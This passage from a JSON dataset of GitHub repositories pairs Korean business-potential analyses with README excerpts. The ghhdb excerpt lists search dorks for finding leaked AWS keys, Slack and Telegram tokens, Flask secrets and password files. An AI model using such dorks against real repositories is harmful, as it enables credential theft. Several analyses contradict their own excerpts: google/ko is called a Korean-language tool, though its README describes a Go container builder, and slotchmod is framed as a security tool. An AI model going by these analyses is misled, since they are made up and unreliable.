Thanks\n\nFirst of all, thanks goes to [Project Croissant][croissant], the [swtpm][swtpm] maintainer, the [Linux-Surface crew][linux-surface] and the [Chromebrew framework][chromebrew] for their work which was actively used when creating this project.\n\n<!-- About This Project -->\n## About This Project\n\nThe purpose of the Brunch framework is to create a generic x86_64 ChromeOS image from an official recovery image. To do so, it uses a 1GB ROOTC partition (containing a custom kernel, an initramfs, the swtpm binaries, userspace patches and config files) and a specific ","composite_score":0.0188,"license_safety_tag":"restricted"},{"name":"yudataguy/Awesome-Japanese","github_url":"https://github.com/yudataguy/Awesome-Japanese","stars":8,"language":"","license":"unknown","abandonment_months":1,"description":"# Awesome-Japanese 상용화 분석\n\n## 왜 보물인가\n일본어를 배우고 싶은 사람들을 위해 체계적으로 정리된 학습 자료와 도구들을 한곳에 모아놓은 큐레이션 저장소입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이 자료를 바탕으로 \"일본어 학습 플랫폼\" 웹사이트를 만들어 월 구독료로 수익화\n2. **내부 업무 도구**: 일본 회사","readme_excerpt":"# Awesome Japanese [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)\n\n> A curated list of Japanese language learning resources.\n\nUpdate: The mobile alpha version is now available ([mobile.md](./mobile.md)). Community input is welcome for selecting the best mobile resources for each category. Please see the GitHub Issues tab for more information.\n\n## Contents\n\n- [Awesome Japanese](#awesome-japanese-)\n  - [Contents](#contents)\n  - [How To Use These Resources](#how-to-use-these-resources)\n  - [Beginner Guide](#beginner-guide)\n  - [Textbook](#textbook)\n    - [Genki :baby:](#genki-baby)\n    - [Tobira :older\\_man:](#tobira-older_man)\n    - [Minna no Nihongo :man:](#minna-no-nihongo-man)\n    - [Other textbooks](#other-textbooks)\n  - [Course](#course)\n  - [Hiragana and Katakana](#hiragana-and-katakana)\n  - [Kanji](#kanji)\n  - [Vocabulary](#vocabulary)\n  - [Grammar](#grammar)\n  - [Reading](","composite_score":0.0188,"license_safety_tag":"unknown"},{"name":"zerotier/DesktopUI","github_url":"https://github.com/zerotier/DesktopUI","stars":5,"language":"C","license":"MPL-2.0","abandonment_months":1,"description":"# ZeroTier DesktopUI 상용화 분석\n\n## 왜 보물인가\nZeroTier는 복잡한 네트워크 설정 없이 컴퓨터들을 마치 같은 네트워크에 있는 것처럼 연결해주는 기술로, 원격 업무나 보안이 필요한 기업들이 매우 원하는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 원격 팀 협업 SaaS**\n- 분산된 팀원들이 보안을 유지하면서 마치 같은 사무","readme_excerpt":"ZeroTier Desktop Tray Application and User Interface\n======\n\nThis is the system tray application and user interface for controlling a local ZeroTier service on Windows, macOS, and (soon) Linux systems.\n\n# Building\n\nOnly macOS and Windows are currently supported. Linux may build but there are still outstanding issues. We're working on full Linux support at least for popular Linux desktop environments that support relatively standard tray application APIs.\n\n## macOS\n\n#### Prerequisites\n\n * Xcode with standard command line tools and SDKs.\n * Rust (and cargo) with targets `x86_64-apple-darwin` and `aarch64-apple-darwin` installed to enable universal binaries to be built.\n * The [Meson/Ninja](https://mesonbuild.com) build system (for libui-ng).\n\nTo build on macOS you should just be able to type `make` from the project root. If all the necessary dependencies are present it should build a `ZeroTier.app` application in the current directory.\n\n## Windows\n\n#### Prerequisites\n\n * [Microsoft Visua","composite_score":0.0187,"license_safety_tag":"unknown"},{"name":"luxonis/depthai-experiments","github_url":"https://github.com/luxonis/depthai-experiments","stars":9,"language":"Python","license":"unknown","abandonment_months":0,"description":"# luxonis/depthai-experiments 분석\n\n## 왜 보물인가\n카메라를 통해 사물까지의 거리를 정확히 측정하는 기술을 다양한 방식으로 실험하고 개선하는 프로젝트로, 자율주행차, 로봇, 보안시스템 등에 필수적인 3D 인식 기술의 연구 자산입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 스마트 시티 카메라 분석 플랫폼으로 교통량","readme_excerpt":"# OAK Examples\n\n> ⚠️ **Looking for the old DepthAIv2 examples?**\\\n> Check out the [`master` branch](https://github.com/luxonis/oak-examples/tree/master) for legacy content and examples built with the previous DepthAIv2 version.\n\n[![Forum](https://img.shields.io/badge/Forum-discuss-orange)](https://discuss.luxonis.com/)\n[![Docs](https://img.shields.io/badge/Docs-DepthAI-yellow)](https://docs.luxonis.com)\n\nThe repository contains various demonstrations, tutorials, and examples showcasing different capabilities of DepthAI and OAK devices. Each category focuses on specific aspects of the technology.\n\nClick on any category below to explore detailed examples for that specific domain.\n\n## Getting the examples\n\nTo clone the repository, use the following:\n\n```\ngit clone --depth 1 --branch main https://github.com/luxonis/oak-examples.git\n```\n\nAfterwards, navigate to desired application as listed below\n\n## Categories\n\n### [📱 Apps](apps/)\n\n<table>\n  <tr>\n    <td width=\"50%\" valign=\"top\">\n      <im","composite_score":0.0187,"license_safety_tag":"unknown"},{"name":"jiro4989/slotchmod","github_url":"https://github.com/jiro4989/slotchmod","stars":6,"language":"Go","license":"MIT","abandonment_months":1,"description":"# slotchmod 보물 분석 보고서\n\n## 왜 보물인가\n파일이나 폴더의 접근 권한을 쉽게 관리할 수 있는 도구로, 서버 보안을 담당하는 개발팀의 반복적인 작업을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 저장소 회사가 고객에게 파일 권한 관리 UI를 제공할 때 핵심 기능으로 활용\n2. **내부 업무 도구**","readme_excerpt":"= slotchmod\n:sectnums:\n:toc: left\n\n`slotchmod` changes file permission with a slot.\nThis is a useful tool when you want to mess up file access permissions.\n\nimage:./docs/demo.gif[]\n\nimage:./docs/demo2.gif[]\n\n== Usage\n\n[source,bash]\n----\nslotchmod [files...]\n----\n\n== Installation\n\n[source,bash]\n----\ngo get github.com/jiro4989/slotchmod\n# or\ngo install github.com/jiro4989/slotchmod@master\n----\n\nor download executables from https://github.com/jiro4989/slotchmod/releases[GitHub Releases].\n\n== Key input\n\n[options=\"header\"]\n|=================\n| Key | Description\n| Enter | Select slot\n| q, Ctrl-C, Ctrl-D | Quit\n|=================\n\n== Help\n\n[source,text]\n----\nslotchmod changes file permissions with a slot\n\nUsage:\n  slotchmod [OPTIONS] [files...]\n\nExamples:\n  slotchmod sample.txt\n\nOptions:\n  -level string\n    slot difficulty. [easy|normal|hard] (default \"normal\")\n----\n","composite_score":0.0187,"license_safety_tag":"safe"},{"name":"Cxbx-Reloaded/Cxbx-Reloaded","github_url":"https://github.com/Cxbx-Reloaded/Cxbx-Reloaded","stars":7,"language":"C++","license":"gpl-2.0","abandonment_months":1,"description":"# Cxbx-Reloaded 분석\n\n## 왜 보물인가\n예전 게임기의 게임을 현대 컴퓨터에서 실행할 수 있게 해주는 오픈소스 프로젝트로, 게임 애호가들과 보존 전문가들이 찾는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 보관소 SaaS**: 클라우드 기반 레트로 게임 플레이 서비스로 구독료 모델 운영\n2. **게임 에뮬레이션 플랫폼**: 중고 게임 ","readme_excerpt":"# Cxbx-Reloaded - Original Xbox Emulator\n[![License: GPL v2](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](https://github.com/Cxbx-Reloaded/Cxbx-Reloaded/blob/master/COPYING)\n[![GitHub Actions](https://github.com/Cxbx-Reloaded/Cxbx-Reloaded/workflows/GitHub%20CI/badge.svg?event=push)](https://github.com/Cxbx-Reloaded/Cxbx-Reloaded/actions?query=event%3Apush+workflow%3A%22GitHub+CI%22)\n[![Discord](https://img.shields.io/badge/chat-on%20discord-7289da.svg?logo=discord)](https://discord.gg/26Xjx23)\n\nCxbx-Reloaded is an emulator for running Microsoft Xbox (and eventually, Chihiro) games on Microsoft Windows and Wine.\n\n## System Requirements\n### Minimum\n  * OS: Windows 7+ x64, or x86-64 Linux with Wine. 32-bit is not supported.\n    * MacOS with Wine is known not to work, and BSD-based systems are untested.\n    * Also note that Wine is relatively unstable, and it might break compatibility with Cxbx-Reloaded at any time without warning.\n  * GPU: Direct3D 9.0c with Pixel Shader Mode","composite_score":0.0187,"license_safety_tag":"restricted"},{"name":"jcesarstef/ghhdb-Github-Hacking-Database","github_url":"https://github.com/jcesarstef/ghhdb-Github-Hacking-Database","stars":5,"language":"","license":"NOASSERTION","abandonment_months":2,"description":"# GitHub Hacking Database (ghhdb) 상업화 분석\n\n## 왜 보물인가\nGitHub 계정 보안 위협을 감지하고 대응하는 데이터베이스로, 기업의 코드 유출 사고를 사전에 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 보안 모니터링 SaaS 서비스**\n- 기업 IT 담당자가 구독하여 직원들의 GitHub 활동을 실시간 감시하고","readme_excerpt":"# ghhdb-Github-Hacking-Database\nGithub Hacking Database - A collection of Github's Dorks to search for Confidential Information (Yes, it's a Github version of Google Dorks)\n\n### API Keys\n\nSearch | Description\n--------- | ------\n\"api_hash\" \"api_id\" \"user_phone\"|Telegram APP Configuration Keys (https://my.telegram.org/apps)\n\"https://api.telegram.org/bot\"|Telegram API URL with Key\n\"aws_access_key_id\" \"aws_secret_access_key\"|AWS API Keys\n\"cloudflare_api_key\" \"cloudflare_email\"|Cloudflare API Key and Email\n\"Client ID\" \"client secret\" \"verification token\"|Slack bot API Key\n\"xoxp-\"|Slack API Key\n\"https://hooks.slack.com/\"|Slack Incoming WebHook API Url with Key\nfilename:passwords.txt|Passwords saved in text file\nfilename:passwords.doc|Passwords saved in doc file (See also .docx extesion)\n\"app.secret_key\" extension=py|flask-login API Key\n\"app.config['SECRET_KEY']\" extension:py|Flask Secret Key\n\"https://api.mailgun.net/v3/\"|Mailgun API URL with Key\n\n### Certificates\n\nSearch | Description\n------","composite_score":0.0185,"license_safety_tag":"unknown"},{"name":"grafana-operator/grafana-operator","github_url":"https://github.com/grafana-operator/grafana-operator","stars":6,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# Grafana Operator 저장소 분석\n\n## 왜 보물인가\n복잡한 모니터링 시스템을 자동으로 관리해주는 도구로, 기업들이 수작업으로 하던 설정 작업을 완전히 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 클라우드 모니터링 SaaS**\n기업 고객들이 자신의 서버 상태를 실시간으로 보고 문제를 빠르게 감지하는 구독형 서비스로 제공할 수 있","readme_excerpt":"<div align=\"center\">\n\n# Grafana Operator\n\n[![Grafana](https://img.shields.io/badge/grafana-%23F46800.svg?&logo=grafana&logoColor=white)](https://grafana.com/)\n[![Grafana Operator](https://img.shields.io/badge/Grafana%20Operator-orange)](https://grafana.github.io/grafana-operator/)\n[![GitHub tag](https://img.shields.io/github/tag/grafana/grafana-operator.svg)](https://github.com/grafana/grafana-operator/tags)\n[![GitHub Last Commit](https://img.shields.io/github/last-commit/grafana/grafana-operator)](https://github.com/grafana/grafana-operator/tags)\n[![GitHub Contributors](https://img.shields.io/github/contributors/grafana/grafana-operator)](https://github.com/grafana/grafana-operator/tags)\n\n**[Official Documentation](https://grafana-operator.github.io/grafana-operator/)** | **[Quickstart](#getting-started)** | **[Installation](#installation)** | **[Tutorials](https://grafana.com/docs/grafana-cloud/developer-resources/infrastructure-as-code/grafana-operator/)**\n\n</div>\n\nThe Grafana Opera","composite_score":0.0185,"license_safety_tag":"safe"},{"name":"GoogleChromeLabs/ProjectVisBug","github_url":"https://github.com/GoogleChromeLabs/ProjectVisBug","stars":6,"language":"JavaScript","license":"apache-2.0","abandonment_months":1,"description":"# ProjectVisBug 상품화 분석\n\n## 왜 보물인가\n웹사이트의 디자인과 레이아웃을 마우스로 직접 클릭하고 드래그해서 수정할 수 있는 도구로, 코딩 없이 웹 페이지를 편집하고 싶은 사람들에게 강력한 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹디자인 회사나 마케팅 대행사가 클라이언트에게 \"코딩 없이 웹사이트 수정\" 기능","readme_excerpt":"<p align=\"center\">\n  <img src=\"./assets/visbug.png\" width=\"300\" height=\"300\" alt=\"visbug\">\n  <br>\n  <a href=\"https://travis-ci.org/GoogleChromeLabs/ProjectVisBug\"><img src=\"https://travis-ci.org/GoogleChromeLabs/ProjectVisBug.svg?branch=master\" alt=\"travis build status\"></a>\n  <a href=\"https://chrome.google.com/webstore/detail/visbug/cdockenadnadldjbbgcallicgledbeoc?hl=en\"><img src=\"https://badgen.net/chrome-web-store/users/cdockenadnadldjbbgcallicgledbeoc\"></a>\n  <a href=\"https://chrome.google.com/webstore/detail/visbug/cdockenadnadldjbbgcallicgledbeoc?hl=en\"><img src=\"https://badgen.net/chrome-web-store/stars/cdockenadnadldjbbgcallicgledbeoc\"></a>\n</p>\n\n# 「VisBug」\n\n> Open source web design debug tools\n\n- Point, click & tinker\n- Hold shift and **multi-select**\n- Edit **any page** in **any state**\n- **Hover inspect** styles, accessibility and alignment\n- **Nitpick** layouts & content, **in the real end environment**, at any device size\n- **Leverage** design tool nudging skills\n- **Edit","composite_score":0.0185,"license_safety_tag":"safe"},{"name":"google/ko","github_url":"https://github.com/google/ko","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# google/ko 저장소 분석\n\n## 왜 보물인가\nGoogle이 공식 지원하는 한국어 관련 오픈소스 프로젝트로, 신뢰성 높은 한국어 처리 기술을 무료로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 한국어 자동 분류, 맞춤법 검사, 텍스트 분석 기능을 제공하는 웹 서비스\n2. **내부 업무 도구**: 기업의 고객 피드백이","readme_excerpt":"# `ko`: Easy Go Containers\n\n[![GitHub Actions Build Status](https://github.com/ko-build/ko/workflows/Build/badge.svg)](https://github.com/ko-build/ko/actions?query=workflow%3ABuild)\n[![GoDoc](https://godoc.org/github.com/google/ko?status.svg)](https://godoc.org/github.com/google/ko)\n[![Go Report Card](https://goreportcard.com/badge/ko-build/ko)](https://goreportcard.com/report/ko-build/ko)\n[![SLSA 3](https://slsa.dev/images/gh-badge-level3.svg)](https://slsa.dev/images/gh-badge-level3.svg)\n\n<img src=\"./docs/images/demo.png\" width=\"100%\">\n\n---\n\n> 🎉 Google has applied for `ko` to join the Cloud Native Computing Foundation as a Sandbox project! Learn more [here](https://opensource.googleblog.com/2022/10/ko-applies-to-become-a-cncf-sandbox-project.html)!\n\n`ko` is a simple, fast container image builder for Go applications.\n\nIt's ideal for use cases where your image contains a single Go application\nwithout any/many dependencies on the OS base image (e.g., no cgo, no OS package\ndependencies).","composite_score":0.0184,"license_safety_tag":"safe"},{"name":"UI-Lovelace-Minimalist/UI","github_url":"https://github.com/UI-Lovelace-Minimalist/UI","stars":13,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"# UI-Lovelace-Minimalist/UI 분석\n\n## 왜 보물인가\n집이나 사무실의 모든 기계를 하나의 화면에서 편하게 조종할 수 있는 홈 자동화 대시보드 디자인 틀입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스마트홈 관리 웹사이트를 만드는 기업들이 이 디자인을 기본 틀로 사용하여 빠르게 출시\n2. **내부 업무 도구**: 공장","readme_excerpt":"# UI-Lovelace-Minimalist\n\n[![Discord](https://badgen.net/discord/online-members/TPXg9b7GfR)](https://discord.gg/TPXg9b7GfR)\n![Version](https://img.shields.io/github/v/release/UI-Lovelace-Minimalist/UI)\n![hacs installs](https://img.shields.io/endpoint.svg?url=https%3A%2F%2Flauwbier.nl%2Fhacs%2Fui_lovelace_minimalist)\n![Downloads](https://img.shields.io/github/downloads/UI-Lovelace-Minimalist/UI/total)\n[![Visualise&nbsp;Repo](https://img.shields.io/badge/Visualise%20Repo-blue?style=flat)](https://repomapr.com/ui-lovelace-minimalist/ui)\n\n> [!IMPORTANT]\n> Looking for New Maintainers!\n>\n> This project is in need of new maintainers! The current maintainers are no longer actively working on it, and without fresh leadership, we may be forced to shut down the project and its associated Discord server.\n>\n> If you're passionate about this project and would like to take over its development and community management, we’d love to hear from you!\n>\n> - Join us on Discord to discuss further: [Thread M","composite_score":0.0183,"license_safety_tag":"safe"},{"name":"simolus3/moor","github_url":"https://github.com/simolus3/moor","stars":9,"language":"Dart","license":"mit","abandonment_months":0,"description":"# Moor 저장소 분석\n\n## 왜 보물인가\n데이터베이스를 쉽게 관리하고 앱을 빠르게 만들 수 있는 개발 도구로, 기술 회사들의 개발 속도를 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 스타트업이 데이터베이스 개발에 드는 시간을 50% 단축하여 저가 데이터 관리 솔루션으로 판매\n2. **내부 업무 도구**: 기","readme_excerpt":"# Drift\n\n[![Build Status](https://github.com/simolus3/drift/actions/workflows/main.yml/badge.svg)](https://github.com/simolus3/drift/actions/workflows/main.yml/badge.svg)\n[![Using melos](https://img.shields.io/badge/maintained%20with-melos-f700ff.svg?style=flat-square)](https://github.com/invertase/melos)\n\n| Core                                                                                      | Generator                                                                                              |\n| :---------------------------------------------------------------------------------------: | :----------------------------------------------------------------------------------------------------: |\n| [![Main version](https://img.shields.io/pub/v/drift.svg)](https://pub.dev/packages/drift) | [![Generator version](https://img.shields.io/pub/v/drift_dev.svg)](https://pub.dev/packages/drift_dev) |\n\nDrift is a reactive persistence library for Flutter and Dart, built on top of\nSQLite.\nDrift is","composite_score":0.0182,"license_safety_tag":"safe"},{"name":"kodsnack/advent_of_code_2018","github_url":"https://github.com/kodsnack/advent_of_code_2018","stars":5,"language":"C++","license":"unknown","abandonment_months":2,"description":"# Advent of Code 2018 저장소 분석\n\n## 왜 보물인가\n매년 수십만 명이 참가하는 국제 프로그래밍 대회의 풀이 모음으로, 문제 해결 방법론과 알고리즘 학습 자료로서 높은 가치를 가집니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 문제 풀이 과정을 튜토리얼 형식으로 변환하여 초급자 코딩 강좌로 판매\n2. **기업 채용","readme_excerpt":"# Advent of code 2018\nContribute your solutions to [Advent of Code 2018](https://adventofcode.com) and be inspired by others.\n\nBidra med dina lösningar på problemen i Advent of code, i vilket språk du vill. Välj ett du kan, eller ett du vill lära dig! Vi har också en ledarbräda (leaderboard) på Advent of code: koden till ledarbrädan är 194162-e06e748d.\n\nVi har också en Slackkanal dit alla är välkomna att snacka Advent of code, eller egentligen allt mellan himmel och jord med lite koppling till kod. Maila info@kodsnack.se eller twittra din epost till @kodsnack så släpper vi in er.\n\nDina lösningar får gärna checkas in i en mapp med namn på formen #användarnamn-språk#, så blir det lite lättare för alla att få överblick.\n\nLösningarna kan komma att diskuteras i avsnitt av Kodsnack, så lägg med en readme.md med en notis om du inte vill riskera att bli omnämnd.\n","composite_score":0.0182,"license_safety_tag":"unknown"},{"name":"imageworks/OpenShadingLanguage","github_url":"https://github.com/imageworks/OpenShadingLanguage","stars":6,"language":"C++","license":"bsd-3-clause","abandonment_months":0,"description":"# OpenShadingLanguage 상용화 분석\n\n## 왜 보물인가\n영화, 게임, 3D 애니메이션 제작에서 화면에 보이는 재질과 빛의 표현을 만드는 핵심 도구로, 전 세계 영상 제작 산업에서 표준처럼 쓰이고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 렌더링 SaaS**: 사용자가 브라우저에서 3D 장면을 업로드하면 서버에서 처리하는 온디맨드","readme_excerpt":"<div align=\"center\">\n  <img src=\"ASWF/logos/openshadinglanguage-stacked-Shaded.png\">\n\n  <!-- <H1>Open Shading Language</H1> -->\n</div>\n\n[![Open Shading Language Reel 2020](http://img.youtube.com/vi/nmwMz1YnGPA/0.jpg)](https://www.youtube.com/watch?v=nmwMz1YnGPA \"Open Shading Language Reel 2020\")\n\n[![Build Status](https://github.com/AcademySoftwareFoundation/OpenShadingLanguage/workflows/CI/badge.svg)](https://github.com/AcademySoftwareFoundation/OpenShadingLanguage/actions)\n[![License](https://img.shields.io/badge/license-BSD%203--Clause-blue.svg?style=flat-square)](https://github.com/AcademySoftwareFoundation/OpenShadingLanguage/LICENSE.md)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/3061/badge)](https://bestpractices.coreinfrastructure.org/projects/3061)\n[![Documentation Status](https://readthedocs.org/projects/open-shading-language/badge/?version=main)](https://open-shading-language.readthedocs.io/en/main/?badge=main)\n\n\nIntroduction\n------------\n\nWel","composite_score":0.0181,"license_safety_tag":"safe"},{"name":"pypa/flit","github_url":"https://github.com/pypa/flit","stars":5,"language":"Python","license":"BSD-3-Clause","abandonment_months":1,"description":"# Flit 저장소 분석\n\n## 왜 보물인가\n프로그래머가 자신의 작업물을 세상에 공개할 때 필요한 복잡한 출판 과정을 매우 간단하게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프로그래머 협업 플랫폼이 Flit을 통합하여 사용자가 클릭 몇 번으로 코드 배포하게 지원\n2. **내부 업무 도구**: 기업의 개발팀이 사내 코드","readme_excerpt":"**Flit** is a simple way to put Python packages and modules on PyPI.\nIt tries to require less thought about packaging and help you avoid common\nmistakes.\nSee `Why use Flit? <https://flit.readthedocs.io/en/latest/rationale.html>`_ for\nmore about how it compares to other Python packaging tools.\n\nInstall\n-------\n\n::\n\n    $ python3 -m pip install flit\n\nFlit requires Python 3 and therefore needs to be installed using the Python 3\nversion of pip.\n\nPython 2 modules can be distributed using Flit, but need to be importable on\nPython 3 without errors.\n\nUsage\n-----\n\nSay you're writing a module ``foobar`` — either as a single file ``foobar.py``,\nor as a directory — and you want to distribute it.\n\n1. Make sure that foobar's docstring starts with a one-line summary of what\n   the module is, and that it has a ``__version__``:\n\n   .. code-block:: python\n\n       \"\"\"An amazing sample package!\"\"\"\n\n       __version__ = \"0.1\"\n\n2. Install flit if you don't already have it::\n\n       python3 -m pip install fl","composite_score":0.018,"license_safety_tag":"safe"},{"name":"AhmedLSayed9/dropdown_button2","github_url":"https://github.com/AhmedLSayed9/dropdown_button2","stars":10,"language":"Dart","license":"MIT","abandonment_months":1,"description":"# dropdown_button2 상용화 분석\n\n## 왜 보물인가\n웹사이트나 앱의 메뉴 버튼을 쉽게 만들 수 있는 재사용 가능한 디자인 요소로, 개발자들이 반복 작업을 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹 기반 관리 도구나 협업 플랫폼에서 사용자 메뉴, 설정 옵션, 필터링 기능 구현\n2. **내부 업무 도구**:","readme_excerpt":"# Flutter DropdownButton2\n\n<a href=\"https://pub.dev/packages/dropdown_button2\">\n  <img src=\"https://img.shields.io/pub/v/dropdown_button2?label=Pub\" alt=\"Pub Version\"/>\n</a>\n<a href=\"https://flutter.dev/\">\n  <img src=\"https://img.shields.io/badge/flutter-%3E%3D%203.32.0-green.svg\" alt=\"Flutter Version\"/>\n</a>\n<a href=\"https://opensource.org/licenses/MIT\">\n  <img src=\"https://img.shields.io/badge/License-MIT-red\" alt=\"License: MIT\"/>\n</a>\n<a href=\"https://github.com/AhmedLSayed9/dropdown_button2/actions\">\n  <img src=\"https://github.com/AhmedLSayed9/dropdown_button2/workflows/Build/badge.svg\" alt=\"Build Status\"/>\n</a>\n\n## Intro\n\nFlutter's core Dropdown Button widget with a steady dropdown menu and many other options you can\ncustomize to your needs.\n\n<img src=\"https://raw.githubusercontent.com/AhmedLSayed9/dropdown_button2/master/.github/images/banner.jpg\" alt=\"Image\" width=\"700\"/>\n\n- [Features](#features)\n- [Options](#options)\n- [Installation](#installation)\n- [Usage and Examples](#usage","composite_score":0.0179,"license_safety_tag":"safe"},{"name":"rolling-scopes/rsschool-app","github_url":"https://github.com/rolling-scopes/rsschool-app","stars":8,"language":"TypeScript","license":"MPL-2.0","abandonment_months":1,"description":"# rsschool-app 사업화 분석\n\n## 왜 보물인가\n온라인 교육 프로그램의 학생 관리와 학습 진행 상황을 자동으로 추적해주는 통합 플랫폼으로, 교육 기관의 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 코딩 부트캠프나 IT 교육 플랫폼에서 월 구독 방식으로 학생 관리 시스템 제공\n- **내부 업무","readme_excerpt":"[![Deploy](https://github.com/rolling-scopes/rsschool-app/actions/workflows/deploy.yaml/badge.svg?branch=master)](https://github.com/rolling-scopes/rsschool-app/actions/workflows/deploy.yaml)\n\n<img src=\"./tools/sloths/public/img/logo.svg\" width=\"250px\"/>\n\n# RS School App\n\n[app.rs.school](https://app.rs.school) is an application for the [RS School](https://rs.school) educational process. It helps thousands of students become front-end, back-end, mobile, and data science engineers.\n\n<img src=\"https://user-images.githubusercontent.com/618807/138608245-f00471ce-f982-4901-a32e-7246720ed13b.png\" width=\"600px\"/>\n\n## Monitoring\n\nhttps://status.rs.school/\n\n## Technology Overview\n\n### Stack\n\n- Language: [TypeScript](https://www.typescriptlang.org/)\n- Front-end: [Next.js](https://nextjs.org/) / [React](https://reactjs.org/)\n- Back-end: [NestJS](https://nestjs.com/) and [Koa.js](https://koajs.com/) (deprecated backend) / [Node.js](https://nodejs.org/en/)\n- End-to-end: [Playwright](https://playwrig","composite_score":0.0179,"license_safety_tag":"unknown"},{"name":"jup-ag/jupiter-swap-api-client","github_url":"https://github.com/jup-ag/jupiter-swap-api-client","stars":193,"language":"Rust","license":"NOASSERTION","abandonment_months":1,"description":"","readme_excerpt":"","composite_score":0.0179,"license_safety_tag":"unknown"},{"name":"oslook/clash-freenode","github_url":"https://github.com/oslook/clash-freenode","stars":8,"language":"","license":"unknown","abandonment_months":0,"description":"# clash-freenode 프로젝트 분석\n\n## 왜 보물인가\n인터넷 속도를 높이거나 지역 제한을 우회할 수 있는 네트워크 도구로, 전 세계 수많은 사용자들이 필요로 하는 기술입니다.\n\n## 어디에 쓸 수 있나\n- **VPN/프록시 서비스**: 개인 사용자를 위한 월 구독형 인터넷 우회 서비스\n- **기업 네트워크 솔루션**: 원격 근무 직원들의 안전한 ","readme_excerpt":"# Clash/V2Ray 免费节点订阅\n\n![Watchers](https://img.shields.io/github/watchers/openrunner/clash-freenode) ![Stars](https://img.shields.io/github/stars/openrunner/clash-freenode) ![Forks](https://img.shields.io/github/forks/openrunner/clash-freenode) ![Vistors](https://visitor-badge.laobi.icu/badge?page_id=openrunner.clash-freenode) ![LICENSE](https://img.shields.io/badge/license-CC%20BY--SA%204.0-green.svg)\n\n## 📢 重要提示\n\n最新订阅地址请访问：[**这里**](https://free.datiya.com/)\n\n订阅Telegram频道：[**这里**](https://t.me/freenodedaily)\n\n**最后更新：** `2026-05-17`\n\n**更新每日节点数列表：**\n\n| 日期 | 节点数 |\n| ---- | ---- |\n| 2026-05-17 | 16 |\n| 2026-05-16 | 16 |\n| 2026-05-15 | 16 |\n| 2026-05-14 | 16 |\n| 2026-05-13 | 16 |\n| 2026-05-12 | 16 |\n| 2026-05-11 | 16 |\n| 2026-05-10 | 16 |\n| 2026-05-09 | 16 |\n| 2026-05-08 | 16 |\n| 2026-05-07 | 16 |\n\n\n## 🔍 使用指南\n\n### 新用户入门\n1. 访问 [这里](https://free.datiya.com/) 获取最新订阅地址\n2. 下载对应的客户端软件\n3. 导入订阅地址即可使用\n\n### 现有用户更新\n- 如果您的订阅地址失效，请访问 [这里](https://free.datiya.com/) 获取新地址\n- 如果您克隆了本仓库，请通过 `git pull` 或在 GitH","composite_score":0.0178,"license_safety_tag":"unknown"},{"name":"mmhelloworld/idris-jvm","github_url":"https://github.com/mmhelloworld/idris-jvm","stars":14,"language":"Idris","license":"bsd-3-clause","abandonment_months":1,"description":"# idris-jvm 프로젝트 분석\n\n## 왜 보물인가\n자바 환경에서 작동하는 특화된 프로그래밍 언어로, 엔터프라이즈 시스템 안정성을 크게 높일 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n- **금융/보험사 내부 업무 도구**: 거래 데이터 검증 및 정산 시스템에서 오류를 원천 차단하는 핵심 엔진으로 판매\n- **클라우드 기반 코드 검증 SaaS**:","readme_excerpt":"Idris 2 for JVM\n============\n[![Build Status](https://github.com/mmhelloworld/idris-jvm/actions/workflows/install.yml/badge.svg)](https://github.com/mmhelloworld/idris-jvm/actions/workflows/install.yml)\n\n[Idris 2](https://idris-lang.org/) is a purely functional programming language\nwith first class types. This repository provides Idris 2 compiler targeting JVM bytecode so that Idris 2 compiler and Idris 2 programs can run on the JVM.\n\n![Alt](https://repobeats.axiom.co/api/embed/ac64c0b18c12514f8bdd3d0b6768437187ea4d88.svg \"Repobeats analytics image\")\n\n## Install\n\n* Download the latest Idris 2 JVM release from [releases page](https://github.com/mmhelloworld/idris-jvm/releases/latest).\n* Extract the archive and add `idris2` launcher script directory `<EXTRACTED_DIRECTORY_ROOT>/exec` to PATH.\n* Create an environment variable `IDRIS2_PREFIX` pointing to `<EXTRACTED_DIRECTORY_ROOT>/env`\n\n## Example\n\n#### helloworld.idr\n\n```idris\n    module Main\n\n    data Tree a = Leaf\n                | Node","composite_score":0.0178,"license_safety_tag":"safe"},{"name":"spiral/roadrunner","github_url":"https://github.com/spiral/roadrunner","stars":6,"language":"Go","license":"MIT","abandonment_months":0,"description":"# spiral/roadrunner 분석 보고서\n\n## 왜 보물인가\n웹 애플리케이션을 매우 빠르게 구축할 수 있는 도구로, 개발 시간과 비용을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 스타트업이 빠르게 웹 기반 업무 관리 플랫폼을 출시하고, 초기 고객 확보 후 구독료로 매월 수익화\n2. **내부 업무 도구**: ","readme_excerpt":"<a href=\"https://roadrunner.dev\" target=\"_blank\">\n  <picture>\n    <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://github.com/roadrunner-server/.github/assets/8040338/e6bde856-4ec6-4a52-bd5b-bfe78736c1ff\">\n    <img align=\"center\" 